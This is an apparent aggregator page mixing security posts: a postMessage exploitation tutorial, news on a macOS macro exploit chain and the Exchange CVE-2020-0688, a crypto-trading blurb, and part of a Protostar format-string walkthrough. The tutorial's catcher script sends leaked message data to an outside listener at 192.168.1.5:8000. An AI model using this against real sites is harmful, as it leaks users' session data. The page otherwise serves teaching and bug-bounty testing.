Dock Koelpin

1599713760

How to spot and exploit postMessage vulnerabilities?

Hey fam, I hope everyone is doing okay and able to use this time efficiently for self development and to self reflect. This coronavirus pandemic has grown a bit tiring, to be honest, and gets the best of us.

Here is my attempt at helping you understand a bug often overlooked when checking webapps or mobile apps, making it a gold mine for all testers, whether seasoned or new.

Prerequisite: the site relies on cookies.

Case 1: message sent to all origins

First a little about postMessage. As described in the Mozilla documentation, the syntax is fairly simple:

postMessage(message, targetOrigin, [transfer]);

The problem occurs when the target origin is set to * (everywhere), or when it is set to, let's say, xyz.com but an improper implementation of the origin check allows one to bypass it by registering a domain like _xyz.com_puter.com. As most of you must have guessed by now, the data is then not restricted to the same origin (the original domain) and can in theory be leaked.

Let's take a closer look at how this can be achieved:

<script>
// Listen for "message" events from any window; event.origin is never checked,
// so a message a page posts with targetOrigin "*" is received here as well.
window.addEventListener("message", function(event){
  // Send the received value to the listener's own server as an image request
  // (img is a void element, so no closing tag is needed)
  document.write("<img src='http://192.168.1.5:8000/?leak=" + event.data.value + "'>");
}, false);
// Placeholder for the URL of the page that posts the message
window.open("vulnerable page leaking data");
</script>

I know this must look kind of confusing at first glance, but stay with me:

Since the message is being sent to all origins, we should be able to catch it. So we created a malicious HTML page with an event listener, basically a catcher that receives any data sent by postMessage.
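The receiver-side origin check is what decides whether a listener like the one above can be fed, or a page's own listener can be abused. The following is an added example, not code from the original post: it contrasts the weak substring check that a look-alike domain defeats with a strict exact-origin check, and shows the sender side using a concrete targetOrigin instead of "*". The origins xyz.com and xyz.com.puter.com are constructed placeholders standing in for the post's example.

```javascript
// Added example (not from the original post): weak vs strict origin policy
// for a postMessage handler. Origins are constructed placeholders.

const TRUSTED_ORIGIN = "https://xyz.com"; // assumed allowlisted origin

// Weak check seen in many handlers: a substring test on event.origin.
// Any origin that merely contains "xyz.com" passes, including look-alikes.
function weakOriginCheck(origin) {
  return origin.indexOf("xyz.com") !== -1;
}

// Strict check: exact match on scheme + host + port. A look-alike domain
// such as xyz.com.puter.com cannot satisfy it.
function strictOriginCheck(origin) {
  return origin === TRUSTED_ORIGIN;
}

// Builds a "message" handler around a given origin policy. It returns its
// decision instead of touching the DOM so it can be exercised offline.
function makeHandler(checkOrigin) {
  return function onMessage(event) {
    if (!checkOrigin(event.origin)) {
      return { accepted: false, reason: "origin rejected: " + event.origin };
    }
    // Validate the payload shape too; never pass event.data to eval/innerHTML.
    const data = event.data;
    if (data === null || typeof data !== "object" || typeof data.value !== "string") {
      return { accepted: false, reason: "unexpected payload shape" };
    }
    return { accepted: true, value: data.value };
  };
}

// Sender side: the second argument must be the concrete target origin,
// not "*", otherwise any window holding a reference can read the message.
function sendToTrusted(targetWindow, payload) {
  targetWindow.postMessage(payload, TRUSTED_ORIGIN);
  return TRUSTED_ORIGIN; // returned so the targetOrigin used can be checked
}

// Constructed sample events, shaped like the MessageEvent fields used above.
const fromTrusted = { origin: "https://xyz.com", data: { value: "session-token" } };
const fromLookAlike = { origin: "https://xyz.com.puter.com", data: { value: "whatever" } };

// In a browser: window.addEventListener("message", strictHandler, false);
const weakHandler = makeHandler(weakOriginCheck);
const strictHandler = makeHandler(strictOriginCheck);
```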

#bugs #javascript #bug-bounty #web-development #hacking

Mikel Okuneva

1597669200

Black Hat 2020: 'Zero-Click' MacOS Exploit Chain Uses Microsoft Office Macros

A new “zero-click” MacOS exploit chain could allow attackers to deliver malware to MacOS users using a Microsoft Office document with macros. The attack bypasses security measures that both Microsoft and Apple have put in place to protect MacOS users from malicious macros.

The exploit chain, revealed by Patrick Wardle, principal security researcher with Jamf, at Black Hat USA 2020, runs macros without the Microsoft Office alert that normally asks for explicit user approval, meaning that when a user opens the document, the macro is executed automatically.

“As the current [macros-based] attacks are lame… I wanted to make them ‘better’ to raise awareness about this attack vector, and also highlight how it could easily be worse,” Wardle told Threatpost. “I found a sandbox escape and a bypass of Apple’s new notarization requirements, and combined that with another zero day (from another researcher) to make a full ‘zero-click’ exploit chain.”

Wardle notified both Microsoft and Apple about his findings. Apple patched the flaws with the release of MacOS 10.15.3, but told Wardle “this issue does not qualify for a CVE.” Microsoft meanwhile told Wardle that the exploit chain was an issue “on the Apple side.”

Current Macro-Based Attacks

A macro is a snippet of executable code that can be added to Microsoft Office documents, generally used to accomplish a task automatically. However, macros are also commonly abused by cybercriminals, who use them for delivering a malicious payload to the endpoint because they can be allowed with a simple, single mouse-click on the part of the user when prompted.

(Image: MacOS exploit chain. Credit: Patrick Wardle)

Microsoft has attempted to block macros-based attacks. The tech giant has disabled them in Microsoft Office by default, so a user gets an alert if they are enabling macros. Microsoft also debuted a feature that sandboxed more recent versions of Microsoft Office applications that are running on modern versions of macOS – so even if (malicious) macros are inadvertently allowed to run, they will find themselves running in a highly restrictive sandbox.

From Apple's end, the company has created notarization checks to prevent potentially malicious code downloaded from the internet from executing on MacOS systems. Notarization is an automated system that scans software for malicious content and checks for code-signing issues. Due to these current protections, previous macros-based exploits have had little success.

However, Wardle’s exploit chain bypassed all of these security protections.

#black hat #mobile security #apple #black hat usa 2020 #cve-2019-1457 #exploit #exploit chain #macos #macros #macros attacks #microsoft #microsoft office #patrick wardle #vulnerability #zero-click

LAVERNE CROOKS

1624554720

HOW TO TRADE SPOT AND FUTURES ON BINANCE. FOR BEGINNERS AND EXPERTS 1

📺 The video in this post was made by LEARN EVERYTHING FOR FREE EFF DONVIP
The origin of the article: https://www.youtube.com/watch?v=OcWU2H1W5K0

🔺 DISCLAIMER: The article is for information sharing. The content of this video is solely the opinion of the speaker, who is not a licensed financial advisor or registered investment advisor. It is not investment advice or legal advice.
Cryptocurrency trading is VERY risky. Make sure you understand these risks and that you are responsible for what you do with your money.
🔥 If you're a beginner, I believe the article below will be useful to you ☞ What You Should Know Before Investing in Cryptocurrency - For Beginner

#what is spot #spot and futures #futures #bitcoin #blockchain

Microsoft Exchange Servers Still Open to Actively Exploited Flaw

Over half of exposed Exchange servers are still vulnerable to a severe bug that allows authenticated attackers to execute code remotely with system privileges – even eight months after Microsoft issued a fix.

The vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft’s mail server and calendaring server. The flaw, which stems from the server failing to properly create unique keys at install time, was fixed as part of Microsoft’s February Patch Tuesday updates – and admins in March were warned that unpatched servers are being exploited in the wild by unnamed advanced persistent threat (APT) actors.

However, new telemetry found that out of 433,464 internet-facing Exchange servers observed, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers are still vulnerable to the flaw.

“There are two important efforts that Exchange administrators and infosec teams need to undertake: verifying deployment of the update and checking for signs of compromise,” said Tom Sellers with Rapid7 in a Tuesday analysis.

Researchers warned in a March advisory that unpatched servers are being exploited in the wild by unnamed APT actors. Attacks first started in late February and targeted “numerous affected organizations,” researchers said. They observed attackers leverage the flaw to run system commands to conduct reconnaissance, deploy webshell backdoors and execute in-memory frameworks, post-exploitation.

Previously, in April, Rapid7 researchers found that more than 80 percent of servers were vulnerable; out of 433,464 internet-facing Exchange servers observed, at least 357,629 were open to the flaw (as of March 24). Researchers used Project Sonar, a scanning tool, to analyze internet-facing Exchange servers and sniff out which were vulnerable to the flaw.

#hacks #vulnerabilities #web security #active exploit #cve-2020-0688 #exchange servers #exploitation #microsoft #microsoft exchange #remote code execution #unpatched servers #vulnerability

[ExpDev] Exploit Exercise | Protostar | Format 4

The goal of this challenge is to redirect our execution flow to print the winning statement by overwriting an entry in the Global Offset Table ("GOT") instead of the return addresses that we used in the previous format string challenges. Let's see how we can do this :)

Things to note

  • **char buffer[512]**: Sets the buffer size to 512.
  • **fgets(buffer, sizeof(buffer), stdin)**: Reads user-supplied input, limited to the size of the buffer, which is 512. We can input at most 511 bytes because C always adds a 0x00 terminator at the end of the string.
  • **printf(buffer);**: This is the vulnerable function in this code. printf() does not check whether the supplied input contains format specifiers, because the user-controlled buffer is passed as the format string itself. So what we can do is simply verify whether we can leak memory addresses and also write arbitrary values into memory ([READ] %p or %x → [WRITE] %n).
  • **exit(1);**: The exit(1) call simply terminates the program. Unlike previous exercises, we do not have a return address after printf() to target; instead, we have this exit(1). But since exit() is called through the Global Offset Table ("GOT"), we can overwrite its GOT entry with the address of hello() to print the winning statement.

What is GOT?

(Image: GOT diagram)

Source: https://ctf101.org/binary-exploitation/what-is-the-got/

Simply put, the GOT is what lets a dynamically linked ELF binary call shared library functions (e.g., exit()). A program does not need to re-implement common functions like exit(); instead, it calls them through pointers in the GOT, which are filled in when the library is loaded at run time. Example ASM file below:

(Image: example ASM file)

Disassemble (GDB)

Let's disassemble the binary to see what it is doing at the assembly level.

$ gdb -q /opt/protostar/bin/format4
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) set disassembly-flavor intel 
(gdb) disassemble vuln

(Image: disassembly of vuln())

As we saw from the source code, the program itself is pretty simple. For now we just need to note the GOT entry address of the exit() function (0x8049724).

#format-string-exploit #protostar-walkthrough #exploit-exercise-format4 #format4-solution #protostart-format4 #string